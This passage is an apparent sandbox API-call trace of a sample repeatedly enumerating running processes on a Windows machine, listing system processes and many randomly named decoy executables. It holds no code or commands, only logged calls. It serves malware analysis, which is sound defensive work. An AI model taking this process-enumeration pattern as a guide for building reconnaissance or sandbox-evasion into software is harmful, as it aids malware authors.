hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.187] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.189] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0145.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0145.192] CloseHandle (hObject=0xbc) returned 1 [0145.192] Sleep (dwMilliseconds=0x12c) [0145.518] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.522] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.524] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.524] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.527] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.529] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.533] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.536] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.566] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.571] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.579] CloseHandle (hObject=0xc4) returned 1 [0145.579] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.585] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0145.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0145.601] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.603] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, 